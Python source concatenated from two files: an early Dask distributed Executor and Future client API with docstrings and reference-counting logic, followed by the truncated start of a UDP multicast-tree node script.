_global_executor = [None]
class Future(WrappedKey):
    """ A remotely running computation

    A Future is a local proxy to a result running on a remote worker.  A user
    manages future objects in the local Python process to determine what
    happens in the larger cluster.

    Examples
    --------
    Futures typically emerge from Executor computations

    >>> my_future = executor.submit(add, 1, 2)  # doctest: +SKIP

    We can track the progress and results of a future

    >>> my_future  # doctest: +SKIP
    <Future: status: finished, key: add-8f6e709446674bad78ea8aeecfee188e>

    We can get the result or the exception and traceback from the future

    >>> my_future.result()  # doctest: +SKIP
    3

    See Also
    --------
    Executor: Creates futures
    """
    def __init__(self, key, executor):
        self.key = key
        self.executor = executor
        # Reference counting lets the executor release remote data once the
        # last local Future pointing at a key is garbage collected.
        self.executor._inc_ref(key)

        if key not in executor.futures:
            executor.futures[key] = {'event': Event(), 'status': 'pending'}

    @property
    def status(self):
        # A key missing from executor.futures means it was released, which
        # this API reports as 'cancelled'.
        try:
            return self.executor.futures[self.key]['status']
        except KeyError:
            return 'cancelled'

    @property
    def event(self):
        # Tornado Event that is set when the computation finishes or errs.
        return self.executor.futures[self.key]['event']

    def done(self):
        """ Is the computation complete? """
        return self.event.is_set()

    def result(self):
        """ Wait until computation completes. Gather result to local process """
        # raiseit=False so the exception object is returned to this thread
        # and raised here, preserving the caller's stack context.
        result = sync(self.executor.loop, self._result, raiseit=False)
        if self.status in ('error', 'cancelled'):
            raise result
        else:
            return result

    @gen.coroutine
    def _result(self, raiseit=True):
        """Coroutine version of ``result``; runs on the executor's loop."""
        try:
            d = self.executor.futures[self.key]
        except KeyError:
            exception = CancelledError(self.key)
            if raiseit:
                raise exception
            else:
                raise gen.Return(exception)
        yield d['event'].wait()
        if self.status == 'error':
            exception = d['exception']
            traceback = d['traceback']  # TODO: use me
            if raiseit:
                raise exception
            else:
                raise Return(exception)
        else:
            result = yield self.executor._gather([self])
            raise gen.Return(result[0])

    @gen.coroutine
    def _exception(self):
        """Coroutine: return the stored exception, or None on success."""
        yield self.event.wait()
        if self.status == 'error':
            exception = self.executor.futures[self.key]['exception']
            raise Return(exception)
        else:
            raise Return(None)

    def exception(self):
        """ Return the exception of a failed task

        See Also
        --------
        Future.traceback
        """
        return sync(self.executor.loop, self._exception)

    def cancelled(self):
        """ Returns True if the future has been cancelled """
        return self.key not in self.executor.futures

    @gen.coroutine
    def _traceback(self):
        """Coroutine: return the stored traceback, or None on success."""
        yield self.event.wait()
        if self.status == 'error':
            raise Return(self.executor.futures[self.key]['traceback'])
        else:
            raise Return(None)

    def traceback(self):
        """ Return the exception of a failed task

        See Also
        --------
        Future.exception
        """
        return sync(self.executor.loop, self._traceback)

    def __del__(self):
        # Dropping the last local reference releases the remote data.
        self.executor._dec_ref(self.key)

    def __str__(self):
        return '<Future: status: %s, key: %s>' % (self.status, self.key)

    __repr__ = __str__
@partial(normalize_token.register, Future)
def normalize_future(f):
    """Tokenize a Future for dask hashing by its key and concrete type."""
    token = [f.key, type(f)]
    return token
class Executor(object):
""" Drive computations on a distributed cluster
The Executor connects users to a distributed compute cluster. It provides
an asynchronous user interface around functions and futures. This class
resembles executors in ``concurrent.futures`` but also allows ``Future``
objects within ``submit/map`` calls.
Parameters
----------
address: string, tuple, or ``Scheduler``
This can be the address of a ``Center`` or ``Scheduler`` servers, either
as a string ``'127.0.0.1:8787'`` or tuple ``('127.0.0.1', 8787)``
or it can be a local ``Scheduler`` object.
Examples
--------
Provide cluster's head node address on initialization:
>>> executor = Executor('127.0.0.1:8787') # doctest: +SKIP
Use ``submit`` method to send individual computations to the cluster
>>> a = executor.submit(add, 1, 2) # doctest: +SKIP
>>> b = executor.submit(add, 10, 20) # doctest: +SKIP
Continue using submit or map on results to build up larger computations
>>> c = executor.submit(add, a, b) # doctest: +SKIP
Gather results with the ``gather`` method.
>>> executor.gather([c]) # doctest: +SKIP
33
See Also
--------
distributed.scheduler.Scheduler: Internal scheduler
"""
def __init__(self, address, start=True, loop=None):
self.futures = dict()
self.refcount = defaultdict(lambda: 0)
self.loop = loop or IOLoop()
self.coroutines = []
self._start_arg = address
if start:
self.start()
    def start(self, **kwargs):
        """ Start scheduler running in separate thread """
        # Idempotent: once the loop thread exists, do nothing.
        if hasattr(self, '_loop_thread'):
            return
        from threading import Thread
        self._loop_thread = Thread(target=self.loop.start)
        self._loop_thread.daemon = True
        # Keep-alive callback so the IOLoop always has scheduled work.
        pc = PeriodicCallback(lambda: None, 1000, io_loop=self.loop)
        self.loop.add_callback(pc.start)
        _global_executor[0] = self
        self._loop_thread.start()
        # Busy-wait until the loop thread is actually running.
        # NOTE(review): relies on tornado's private ``IOLoop._running`` flag;
        # confirm against the pinned tornado version.
        while not self.loop._running:
            sleep(0.001)
        # Complete the scheduler handshake on the loop thread.
        sync(self.loop, self._start, **kwargs)
def _send_to_scheduler(self, msg):
if isinstance(self.scheduler, Scheduler):
self.loop.add_callback(self.scheduler_queue.put_nowait, msg)
elif isinstance(self.scheduler_stream, IOStream):
write(self.scheduler_stream, msg)
else:
raise NotImplementedError()
    @gen.coroutine
    def _start(self, **kwargs):
        """Connect to (or wrap) the scheduler and start report handling.

        ``self._start_arg`` may be a ``Scheduler`` instance, an
        ``'ip:port'`` string, or an ``(ip, port)`` tuple; strings are
        normalized to tuples before connecting.
        """
        if isinstance(self._start_arg, Scheduler):
            self.scheduler = self._start_arg
            self.center = self._start_arg.center
        if isinstance(self._start_arg, str):
            ip, port = tuple(self._start_arg.split(':'))
            self._start_arg = (ip, int(port))
        if isinstance(self._start_arg, tuple):
            r = coerce_to_rpc(self._start_arg)
            ident = yield r.identity()
            if ident['type'] == 'Center':
                # Bare Center: run our own local Scheduler against it.
                self.center = r
                self.scheduler = Scheduler(self.center, loop=self.loop,
                                           **kwargs)
                self.scheduler.listen(0)
            elif ident['type'] == 'Scheduler':
                # Remote scheduler: open the control stream and start it.
                self.scheduler = r
                self.scheduler_stream = yield connect(*self._start_arg)
                yield write(self.scheduler_stream, {'op': 'start-control'})
                if 'center' in ident:
                    cip, cport = ident['center']
                    self.center = rpc(ip=cip, port=cport)
                else:
                    self.center = self.scheduler
            else:
                raise ValueError("Unknown Type")

        if isinstance(self.scheduler, Scheduler):
            # Local scheduler: make sure it runs and wire up its queues.
            if self.scheduler.status != 'running':
                yield self.scheduler.sync_center()
                self.scheduler.start()
            self.scheduler_queue = Queue()
            self.report_queue = Queue()
            self.coroutines.append(self.scheduler.handle_queues(
                self.scheduler_queue, self.report_queue))

        start_event = Event()
        self.coroutines.append(self._handle_report(start_event))

        _global_executor[0] = self
        # Block until the report stream handshake completes.
        yield start_event.wait()
        logger.debug("Started scheduling coroutines. Synchronized")
def __enter__(self):
if not self.loop._running:
self.start()
return self
    def __exit__(self, type, value, traceback):
        # Always shut down on context exit, whether or not an exception
        # is propagating (exceptions are not suppressed).
        self.shutdown()
def _inc_ref(self, key):
self.refcount[key] += 1
def _dec_ref(self, key):
self.refcount[key] -= 1
if self.refcount[key] == 0:
del self.refcount[key]
self._release_key(key)
    def _release_key(self, key):
        """ Release key from distributed memory """
        logger.debug("Release key %s", key)
        # Clear the event before deleting local state so any Future still
        # holding it sees "not done" rather than a stale "finished".
        if key in self.futures:
            self.futures[key]['event'].clear()
            del self.futures[key]
        # Tell the scheduler the data is no longer needed locally.
        self._send_to_scheduler({'op': 'release-held-data', 'keys': [key]})
@gen.coroutine
def _handle_report(self, start_event):
""" Listen to scheduler """
if isinstance(self.scheduler, Scheduler):
next_message = self.report_queue.get
elif isinstance(self.scheduler_stream, IOStream):
next_message = lambda: read(self.scheduler_stream)
else:
raise NotImplemented()
while True:
try:
msg = yield next_message()
except StreamClosedError:
break
if msg['op'] == 'stream-start':
start_event.set()
if msg['op'] == 'close':
break
if msg['op'] == 'key-in-memory':
if msg['key'] in self.futures:
self.futures[msg['key']]['status'] = 'finished'
self.futures[msg['key']]['event'].set()
if msg['op'] == 'lost-data':
if msg['key'] in self.futures:
self.futures[msg['key']]['status'] = 'lost'
self.futures[msg['key']]['event'].clear()
if msg['op'] == 'task-erred':
if msg['key'] in self.futures:
self.futures[msg['key']]['status'] = 'error'
self.futures[msg['key']]['exception'] = msg['exception']
self.futures[msg['key']]['traceback'] = msg['traceback']
self.futures[msg['key']]['event'].set()
if msg['op'] == 'restart':
logger.info("Receive restart signal from scheduler")
events = [d['event'] for d in self.futures.values()]
self.futures.clear()
for e in events:
e.set()
with ignoring(AttributeError):
self._restart_event.set()
@gen.coroutine
def _shutdown(self, fast=False):
""" Send shutdown signal and wait until scheduler completes """
self._send_to_scheduler({'op': 'close'})
if _global_executor[0] is self:
_global_executor[0] = None
if not fast:
yield self.coroutines
def shutdown(self, timeout=10):
""" Send shutdown signal and wait until scheduler terminates """
self._send_to_scheduler({'op': 'close'})
self.loop.stop()
self._loop_thread.join(timeout=timeout)
if _global_executor[0] is self:
_global_executor[0] = None
    def submit(self, func, *args, **kwargs):
        """ Submit a function application to the scheduler

        Parameters
        ----------
        func: callable
        *args:
        **kwargs:
        pure: bool (defaults to True)
            Whether or not the function is pure.  Set ``pure=False`` for
            impure functions like ``np.random.random``.
        workers: set, iterable of sets
            A set of worker hostnames on which computations may be performed.
            Leave empty to default to all workers (common case)
        allow_other_workers: bool (defaults to False)
            Whether the ``workers`` restriction may be relaxed by the
            scheduler; requires ``workers`` to be given.

        Examples
        --------
        >>> c = executor.submit(add, a, b)  # doctest: +SKIP

        Returns
        -------
        Future

        See Also
        --------
        Executor.map: Submit on many arguments at once
        """
        if not callable(func):
            raise TypeError("First input to submit must be a callable function")

        key = kwargs.pop('key', None)
        pure = kwargs.pop('pure', True)
        workers = kwargs.pop('workers', None)
        allow_other_workers = kwargs.pop('allow_other_workers', False)

        if allow_other_workers not in (True, False, None):
            raise TypeError("allow_other_workers= must be True or False")

        if key is None:
            # Pure functions get deterministic keys so identical submissions
            # deduplicate; impure ones get a unique key per call.
            if pure:
                key = funcname(func) + '-' + tokenize(func, kwargs, *args)
            else:
                key = funcname(func) + '-' + str(uuid.uuid4())

        # Already known to the scheduler: just hand back another Future.
        if key in self.futures:
            return Future(key, self)

        if kwargs:
            task = (apply, func, args, kwargs)
        else:
            task = (func,) + args

        if allow_other_workers and workers is None:
            raise ValueError("Only use allow_other_workers= if using workers=")

        if isinstance(workers, str):
            workers = [workers]
        if workers is not None:
            restrictions = {key: workers}
            loose_restrictions = {key} if allow_other_workers else set()
        else:
            restrictions = {}
            loose_restrictions = set()

        # Replace any embedded Futures/remote data with their keys.
        task2, _ = unpack_remotedata(task)

        logger.debug("Submit %s(...), %s", funcname(func), key)
        self._send_to_scheduler({'op': 'update-graph',
                                 'dsk': {key: task2},
                                 'keys': [key],
                                 'restrictions': restrictions,
                                 'loose_restrictions': loose_restrictions})

        return Future(key, self)
    def map(self, func, *iterables, **kwargs):
        """ Map a function on a sequence of arguments

        Arguments can be normal objects or Futures

        Parameters
        ----------
        func: callable
        iterables: Iterables
        pure: bool (defaults to True)
            Whether or not the function is pure.  Set ``pure=False`` for
            impure functions like ``np.random.random``.
        workers: set, iterable of sets
            A set of worker hostnames on which computations may be performed.
            Leave empty to default to all workers (common case)

        Examples
        --------
        >>> L = executor.map(func, sequence)  # doctest: +SKIP

        Returns
        -------
        list of futures

        See also
        --------
        Executor.submit: Submit a single function
        """
        pure = kwargs.pop('pure', True)
        workers = kwargs.pop('workers', None)
        allow_other_workers = kwargs.pop('allow_other_workers', False)

        if allow_other_workers and workers is None:
            raise ValueError("Only use allow_other_workers= if using workers=")

        if not callable(func):
            raise TypeError("First input to map must be a callable function")

        # Materialize so the iterables can be traversed more than once.
        iterables = [list(it) for it in iterables]
        if pure:
            # Deterministic keys: identical calls map to identical tasks.
            keys = [funcname(func) + '-' + tokenize(func, kwargs, *args)
                    for args in zip(*iterables)]
        else:
            uid = str(uuid.uuid4())
            keys = [funcname(func) + '-' + uid + '-' + str(uuid.uuid4())
                    for i in range(min(map(len, iterables)))]

        if not kwargs:
            dsk = {key: (func,) + args
                   for key, args in zip(keys, zip(*iterables))}
        else:
            dsk = {key: (apply, func, args, kwargs)
                   for key, args in zip(keys, zip(*iterables))}

        # Replace any embedded Futures/remote data with their keys.
        dsk = {key: unpack_remotedata(task)[0] for key, task in dsk.items()}

        if isinstance(workers, str):
            workers = [workers]
        if isinstance(workers, (list, set)):
            if workers and isinstance(first(workers), (list, set)):
                # Per-task restrictions: one worker-set per key.
                if len(workers) != len(keys):
                    raise ValueError("You only provided %d worker restrictions"
                                     " for a sequence of length %d"
                                     % (len(workers), len(keys)))
                restrictions = dict(zip(keys, workers))
            else:
                # One shared worker-set for every key.
                restrictions = {key: workers for key in keys}
        elif workers is None:
            restrictions = {}
        else:
            raise TypeError("Workers must be a list or set of workers or None")
        if allow_other_workers not in (True, False, None):
            raise TypeError("allow_other_workers= must be True or False")
        if allow_other_workers is True:
            loose_restrictions = set(keys)
        else:
            loose_restrictions = set()

        logger.debug("map(%s, ...)", funcname(func))
        self._send_to_scheduler({'op': 'update-graph',
                                 'dsk': dsk,
                                 'keys': keys,
                                 'restrictions': restrictions,
                                 'loose_restrictions': loose_restrictions})

        return [Future(key, self) for key in keys]
    @gen.coroutine
    def _gather(self, futures):
        """Coroutine: wait for *futures* then fetch their data.

        Retries the gather whenever the scheduler reports missing keys,
        clearing the corresponding events so we wait for recomputation.
        """
        futures2, keys = unpack_remotedata(futures)
        keys = list(keys)

        while True:
            logger.debug("Waiting on futures to clear before gather")
            yield All([self.futures[key]['event'].wait() for key in keys
                       if key in self.futures])
            # Surface the first task error rather than gathering.
            exceptions = [self.futures[key]['exception'] for key in keys
                          if self.futures[key]['status'] == 'error']
            if exceptions:
                raise exceptions[0]
            response, data = yield self.scheduler.gather(keys=keys)

            if response == b'error':
                # Some keys vanished (e.g. worker died): report and retry.
                logger.debug("Couldn't gather keys %s", data)
                self._send_to_scheduler({'op': 'missing-data',
                                         'missing': data.args})
                for key in data.args:
                    self.futures[key]['event'].clear()
            else:
                break

        # Re-nest the flat data into the original container shape.
        result = pack_data(futures2, data)
        raise gen.Return(result)
    def gather(self, futures):
        """ Gather futures from distributed memory

        Accepts a future or any nested core container of futures

        Examples
        --------
        >>> from operator import add  # doctest: +SKIP
        >>> e = Executor('127.0.0.1:8787')  # doctest: +SKIP
        >>> x = e.submit(add, 1, 2)  # doctest: +SKIP
        >>> e.gather(x)  # doctest: +SKIP
        3
        >>> e.gather([x, [x], x])  # support lists and dicts # doctest: +SKIP
        [3, [3], 3]

        See Also
        --------
        Executor.scatter: Send data out to cluster
        """
        # Blocking wrapper: runs the coroutine on the executor's loop thread.
        return sync(self.loop, self._gather, futures)
    @gen.coroutine
    def _scatter(self, data, workers=None):
        """Coroutine: push *data* to workers and wrap the results as Futures.

        The scheduler returns remote-data handles; each is re-wrapped as a
        Future registered with this executor and immediately marked
        'finished' since the data already lives on the cluster.
        """
        remotes = yield self.scheduler.scatter(data=data, workers=workers)
        if isinstance(remotes, list):
            remotes = [Future(r.key, self) for r in remotes]
            keys = {r.key for r in remotes}
        elif isinstance(remotes, dict):
            remotes = {k: Future(v.key, self) for k, v in remotes.items()}
            keys = set(remotes)
        # NOTE(review): if the scheduler ever returns something that is
        # neither a list nor a dict, ``keys`` is unbound here (NameError).
        for key in keys:
            self.futures[key]['status'] = 'finished'
            self.futures[key]['event'].set()
        raise gen.Return(remotes)
    def scatter(self, data, workers=None):
        """ Scatter data into distributed memory

        Accepts a list of data elements or dict of key-value pairs

        Optionally provide a set of workers to constrain the scatter.  Specify
        workers as hostname/port pairs, e.g. ``('127.0.0.1', 8787)``.

        Examples
        --------
        >>> e = Executor('127.0.0.1:8787')  # doctest: +SKIP
        >>> e.scatter([1, 2, 3])  # doctest: +SKIP
        [RemoteData<center=127.0.0.1:8787, key=d1d26ff2-8...>,
         RemoteData<center=127.0.0.1:8787, key=d1d26ff2-8...>,
         RemoteData<center=127.0.0.1:8787, key=d1d26ff2-8...>]
        >>> e.scatter({'x': 1, 'y': 2, 'z': 3})  # doctest: +SKIP
        {'x': RemoteData<center=127.0.0.1:8787, key=x>,
         'y': RemoteData<center=127.0.0.1:8787, key=y>,
         'z': RemoteData<center=127.0.0.1:8787, key=z>}
        >>> e.scatter([1, 2, 3], workers=[('hostname', 8788)])  # doctest: +SKIP

        See Also
        --------
        Executor.gather: Gather data back to local process
        """
        # Blocking wrapper: runs the coroutine on the executor's loop thread.
        return sync(self.loop, self._scatter, data, workers=workers)
    @gen.coroutine
    def _get(self, dsk, keys, restrictions=None, raise_on_error=True):
        """Coroutine: submit a dask graph and gather the requested keys.

        When ``raise_on_error`` is False the result is a ``(status, value)``
        pair ('OK'/'error') instead of raising, so the blocking caller can
        re-raise in its own thread.
        """
        flatkeys = list(flatten([keys]))
        futures = {key: Future(key, self) for key in flatkeys}

        # Strip embedded remote-data, then drop trivial ``key: key`` aliases.
        dsk2 = {k: unpack_remotedata(v)[0] for k, v in dsk.items()}
        dsk3 = {k: v for k, v in dsk2.items() if (k == v) is not True}

        self._send_to_scheduler({'op': 'update-graph',
                                 'dsk': dsk3,
                                 'keys': flatkeys,
                                 'restrictions': restrictions or {}})

        # Re-nest the futures into the shape of the requested keys.
        packed = pack_data(keys, futures)
        if raise_on_error:
            result = yield self._gather(packed)
        else:
            try:
                result = yield self._gather(packed)
                result = 'OK', result
            except Exception as e:
                result = 'error', e
        raise gen.Return(result)
def get(self, dsk, keys, **kwargs):
    """ Compute dask graph
    Parameters
    ----------
    dsk: dict
    keys: object, or nested lists of objects
    restrictions: dict (optional)
        A mapping of {key: {set of worker hostnames}} that restricts where
        jobs can take place
    Examples
    --------
    >>> from operator import add  # doctest: +SKIP
    >>> e = Executor('127.0.0.1:8787')  # doctest: +SKIP
    >>> e.get({'x': (add, 1, 2)}, 'x')  # doctest: +SKIP
    3
    See Also
    --------
    Executor.compute: Compute asynchronous collections
    """
    # Run _get with raise_on_error=False so any remote exception is
    # re-raised here, in the caller's thread, with a clean traceback.
    status, result = sync(self.loop, self._get, dsk, keys,
                          raise_on_error=False, **kwargs)
    if status == 'error':
        raise result
    else:
        return result
def compute(self, *args, **kwargs):
    """ Compute dask collections on cluster
    Parameters
    ----------
    args: iterable of dask objects
        Collections like dask.array or dataframe or dask.value objects
    sync: bool (optional)
        Returns Futures if False (default) or concrete values if True
    Returns
    -------
    List of Futures
    Examples
    --------
    >>> from dask import do, value
    >>> from operator import add
    >>> x = dask.do(add)(1, 2)
    >>> y = dask.do(add)(x, x)
    >>> xx, yy = executor.compute(x, y)  # doctest: +SKIP
    >>> xx  # doctest: +SKIP
    <Future: status: finished, key: add-8f6e709446674bad78ea8aeecfee188e>
    >>> xx.result()  # doctest: +SKIP
    3
    >>> yy.result()  # doctest: +SKIP
    6
    See Also
    --------
    Executor.get: Normal synchronous dask.get function
    """
    sync = kwargs.pop('sync', False)
    # Fix: was ``assert not kwargs`` — asserts are stripped under -O and
    # give no hint about which argument was wrong.
    if kwargs:
        raise TypeError("Unexpected keyword arguments: %s"
                        % ", ".join(sorted(kwargs)))
    if sync:
        return dask.compute(*args, get=self.get)

    # Optimize each collection with its own optimizer, merged per group.
    variables = [a for a in args if isinstance(a, Base)]
    groups = groupby(lambda x: x._optimize, variables)
    dsk = merge([opt(merge([v.dask for v in val]),
                     [v._keys() for v in val])
                 for opt, val in groups.items()])
    # One finalize task per collection turns its keys into one result.
    names = ['finalize-%s' % tokenize(v) for v in variables]
    dsk2 = {name: (v._finalize, v._keys()) for name, v in zip(names, variables)}
    # Strip RemoteData wrappers before shipping the graph.
    dsk3 = {k: unpack_remotedata(v)[0] for k, v in merge(dsk, dsk2).items()}
    self._send_to_scheduler({'op': 'update-graph',
                             'dsk': dsk3,
                             'keys': names})
    # Pair each dask collection with its finalize Future; pass non-dask
    # arguments through unchanged, preserving the input order.
    name_iter = iter(names)
    futures = [Future(next(name_iter), self) if isinstance(arg, Base) else arg
               for arg in args]
    return futures
@gen.coroutine
def _restart(self):
    """Coroutine backing ``restart``: ask the scheduler to restart and
    wait for the restart event to fire before resolving."""
    self._send_to_scheduler({'op': 'restart'})
    self._restart_event = Event()
    yield self._restart_event.wait()
    raise gen.Return(self)
def restart(self):
    """ Restart the distributed network
    This kills all active work, deletes all data on the network, and
    restarts the worker processes.
    """
    # Blocking wrapper around the _restart coroutine.
    return sync(self.loop, self._restart)
@gen.coroutine
def _upload_file(self, filename, raise_on_error=True):
    """Coroutine backing ``upload_file``: broadcast the file's bytes to
    every worker.

    Raises (or returns, per ``raise_on_error``) the first exception any
    worker reported.
    """
    with open(filename, 'rb') as f:
        data = f.read()
    _, fn = os.path.split(filename)
    d = yield self.center.broadcast(msg={'op': 'upload_file',
                                         'filename': fn,
                                         'data': data})
    if any(isinstance(v, Exception) for v in d.values()):
        exception = next(v for v in d.values() if isinstance(v, Exception))
        if raise_on_error:
            raise exception
        else:
            raise gen.Return(exception)
    # Each worker echoes back how many bytes it received.
    assert all(len(data) == v for v in d.values())
def upload_file(self, filename):
    """ Upload local package to workers
    This sends a local file up to all worker nodes.  This file is placed
    into a temporary directory on Python's system path so any .py or .egg
    files will be importable.
    Parameters
    ----------
    filename: string
        Filename of .py or .egg file to send to workers
    Examples
    --------
    >>> executor.upload_file('mylibrary.egg')  # doctest: +SKIP
    >>> from mylibrary import myfunc  # doctest: +SKIP
    >>> L = e.map(myfunc, seq)  # doctest: +SKIP
    """
    # Collect any worker-side exception and re-raise it in this thread.
    result = sync(self.loop, self._upload_file, filename,
                  raise_on_error=False)
    if isinstance(result, Exception):
        raise result
@gen.coroutine
def _wait(fs, timeout=None, return_when='ALL_COMPLETED'):
    """Coroutine backing ``wait``: block until every future in *fs* has
    completed, then resolve to a (done, not_done) pair.

    Only return_when='ALL_COMPLETED' and timeout=None are implemented.
    """
    if timeout is not None:
        raise NotImplementedError("Timeouts not yet supported")
    if return_when == 'ALL_COMPLETED':
        yield All({f.event.wait() for f in fs})
        done, not_done = set(fs), set()
    else:
        raise NotImplementedError("Only return_when='ALL_COMPLETED' supported")
    raise gen.Return(DoneAndNotDoneFutures(done, not_done))
ALL_COMPLETED = 'ALL_COMPLETED'
def wait(fs, timeout=None, return_when='ALL_COMPLETED'):
    """ Wait until all futures are complete
    Parameters
    ----------
    fs: list of futures
    Returns
    -------
    Named tuple of completed, not completed
    """
    # Run the _wait coroutine on the default executor's event loop.
    return sync(default_executor().loop, _wait, fs, timeout, return_when)
@gen.coroutine
def _as_completed(fs, queue):
    """Feed futures into *queue* in completion order.

    Futures sharing a key are grouped so each key is awaited only once;
    when it completes, every future with that key is enqueued.
    """
    groups = groupby(lambda f: f.key, fs)
    firsts = [v[0] for v in groups.values()]
    wait_iterator = gen.WaitIterator(*[f.event.wait() for f in firsts])
    while not wait_iterator.done():
        result = yield wait_iterator.next()
        # TODO: handle case of restarted futures
        future = firsts[wait_iterator.current_index]
        for f in groups[future.key]:
            queue.put_nowait(f)
def as_completed(fs):
    """ Return futures in the order in which they complete
    This returns an iterator that yields the input future objects in the order
    in which they complete.  Calling ``next`` on the iterator will block until
    the next future completes, irrespective of order.
    This function does not return futures in the order in which they are input.
    """
    # Generalization: materialize first so any iterable (including a
    # generator) works — the original iterated ``fs`` twice.
    fs = list(fs)
    if len({f.executor for f in fs}) == 1:
        loop = fs[0].executor.loop
    else:
        # TODO: Groupby executor, spawn many _as_completed coroutines
        raise NotImplementedError(
            "as_completed on many event loops not yet supported")
    from .compatibility import Queue
    queue = Queue()
    # add_callback forwards extra args, so no lambda wrapper is needed.
    loop.add_callback(_as_completed, fs, queue)
    for _ in range(len(fs)):
        yield queue.get()
def default_executor(e=None):
    """ Return an executor if exactly one has started """
    # An explicitly supplied executor always wins.
    if e:
        return e
    # Otherwise fall back to the single globally registered one.
    registered = _global_executor[0]
    if registered:
        return registered
    raise ValueError("No executors found\n"
                     "Start an executor and point it to the center address\n"
                     " from distributed import Executor\n"
                     " executor = Executor('ip-addr-of-center:8787')\n")
|
mcastnode.py | #!/usr/bin/python
# -------------------------------------------------------------------------
# Goals :
# ------
# Multicast node
# *************************************************************************
# ======================
# Import section
# ======================
import sys
import signal
import string
import random
from threading import *
from socket import *
from optparse import OptionParser
def setTimeout(func, time):
    """Schedule *func* to run after *time* seconds; return the started Timer."""
    timer = Timer(time, func)
    timer.start()
    return timer
class TimedOutObj:
    """Wrap *obj* inside *collection*, auto-removing it after *time*
    seconds unless ``resetTimeout`` is called to refresh it."""

    def __init__(self, obj, collection, time):
        self.obj = obj
        self.collection = collection
        self.time = time
        # Bug fix: initialise so unsetTimeout() is safe before any timer
        # has been armed (previously raised AttributeError).
        self.timeout = None

    def register(self):
        """Add self to the collection and arm the expiry timer."""
        self.collection.append(self)
        self.resetTimeout()

    def unregister(self):
        """Disarm the timer and remove self from the collection."""
        self.unsetTimeout()
        self.collection.remove(self)

    def unsetTimeout(self):
        """Cancel any pending expiry timer."""
        if self.timeout:
            self.timeout.cancel()
        self.timeout = None

    def resetTimeout(self):
        """Restart the expiry countdown from now."""
        self.unsetTimeout()
        self.timeout = setTimeout(self.unregister, self.time)
# ====================================================
# Constants
# ====================================================
MCAST_PORT = 10000       # UDP port of the control protocol
DATA_PORT = 10001        # UDP port on which payload data is forwarded
MCAST_MSG_LEN = 1024     # max control-datagram size in bytes
ROOT_REFRESH = 120  # seconds between root keep-alive registrations
NODE_REFRESH = 120  # seconds between parent keep-alives
CHILDREN_MAX = 3         # fan-out limit of the multicast tree
CHILDREN_TIMEOUT = 180  # seconds before a silent child is dropped
SOCKET_TIMEOUT = 3.0     # seconds to wait for a keep-alive reply
# Message types (4-letter tags prefixed to every control datagram)
ROOT = "ROOT"  # query: who is the root?
TOOR = "TOOR"  # reply: the root is "host port"
RREG = "RREG"  # request to register as root
YREG = "YREG"  # root registration accepted
NREG = "NREG"  # root registration refused
RJOI = "RJOI"  # request to join a node (also used as keep-alive)
YJOI = "YJOI"  # join accepted
NJOI = "NJOI"  # join refused; current children listed in payload
class MC_Node(Thread):
    """A node of an application-level multicast tree.

    Speaks a small 4-letter-tag text protocol over UDP (see the message
    type constants above).  A rendezvous point (``rp_addr``) tracks who
    the tree root is; every node joins a parent and forwards data-port
    datagrams to at most CHILDREN_MAX children.
    """

    # ====================================================
    # Constructor
    # ====================================================
    def __init__(self, rp_addr):
        Thread.__init__(self)
        self.mcast_sock = socket(AF_INET, SOCK_DGRAM)
        self.mcast_sock.bind(('', MCAST_PORT))
        self.rp_addr = rp_addr
        # Resolve addresses
        self.addr = self.mcast_sock.getsockname()
        self.data_addr = (self.addr[0], DATA_PORT)
        # List of TimedOutObj wrappers around child addresses.
        self.childrens = []

    def mcast_send(self, dest, type, data):
        """Send the control message "TYPE\\r\\ndata" to *dest*."""
        msg = type[:4] + "\r\n" + data
        print('to: ', dest)
        print('type:', type, ' data: ', data)
        self.mcast_sock.sendto(msg.encode('UTF-8'), dest)

    def mcast_recv(self):
        """Receive one control message and return it as text.

        Bug fix: decode the datagram — comparing raw bytes slices with
        the str message-type constants was always False under Python 3.
        """
        data, addr = self.mcast_sock.recvfrom(MCAST_MSG_LEN)
        data = data.decode('UTF-8')
        print('from: ', addr)
        print('type: ', data[:4], ' data: ', data[6:])
        return data

    # Root stuff
    def getRoot(self):
        """Ask the rendezvous point for the current root.

        Returns a (host, port) pair, or () when unknown/invalid.
        """
        self.mcast_send(self.rp_addr, ROOT, '')
        data = self.mcast_recv()
        if data[:4] == TOOR:
            # Bug fix: string.split/string.lstrip were removed in
            # Python 3; use the equivalent str methods.
            root = tuple(data[4:].lstrip().split())
            if len(root) == 2:
                return (root[0], int(root[1]))
        # TODO throw an error
        return ()

    def registerRoot(self):
        """Try to register this node as the root; True on success."""
        self.mcast_send(self.rp_addr, RREG, '')
        data = self.mcast_recv()
        if data[:4] == YREG:
            return True
        elif data[:4] == NREG:
            return False
        # TODO throw an error
        return

    def updateRoot(self):
        """Periodic keep-alive: re-register as root and re-arm the timer."""
        if self.registerRoot():
            self.runRoot()
        return

    def runRoot(self):
        # Re-announce ourselves as root every ROOT_REFRESH seconds.
        self.root_timeout = setTimeout(self.updateRoot, ROOT_REFRESH)

    # Node stuff
    def registerNode(self, node_addr):
        """Try to join *node_addr* as our parent; on refusal, retry on a
        randomly chosen child advertised in the NJOI reply."""
        self.mcast_send(node_addr, RJOI, '')
        data = self.mcast_recv()
        if data[:4] == YJOI:
            # Success -> set parent
            self.parent = node_addr
            self.runNode()
        elif data[:4] == NJOI:
            # Failure -> register on a random advertised child.
            # NOTE(review): the port is kept as a str here; sendto needs
            # an int port — verify against what registerChild advertises.
            child_addr = tuple(data[4:].split('\r\n')[
                random.randint(0, 2)].split())
            # Bug fix: was a call to the undefined name nodeRegister().
            self.registerNode(child_addr)

    def updateNode(self):
        """Keep-alive towards the parent with retries; if the parent
        stays silent, rejoin the tree starting from the root."""
        self.mcast_send(self.parent, RJOI, '')
        self.mcast_sock.settimeout(SOCKET_TIMEOUT)
        for i in range(0, 3):
            try:
                data = self.mcast_recv()
                if data[:4] == YJOI:
                    self.mcast_sock.settimeout(None)
                    self.runNode()
                    return
            except Exception:
                # best-effort retry on timeout/decode errors
                pass
        self.mcast_sock.settimeout(None)
        # Bug fix: was a call to the undefined name nodeRegister().
        self.registerNode(self.getRoot())

    def runNode(self):
        # Refresh our registration with the parent every NODE_REFRESH s.
        self.node_timeout = setTimeout(self.updateNode, NODE_REFRESH)

    # Child stuff
    def registerChild(self, child_addr):
        """Accept *child_addr* as a child if there is room, else refuse
        and advertise the current children so it can retry lower down.

        Bug fixes: ``self`` was missing from the signature; the raw
        address was appended next to the TimedOutObj wrapper (dataLoop
        expects ``.obj`` entries); ``register`` was referenced but never
        called; the NJOI payload read the undefined name ``childrens``.
        """
        if len(self.childrens) < CHILDREN_MAX:
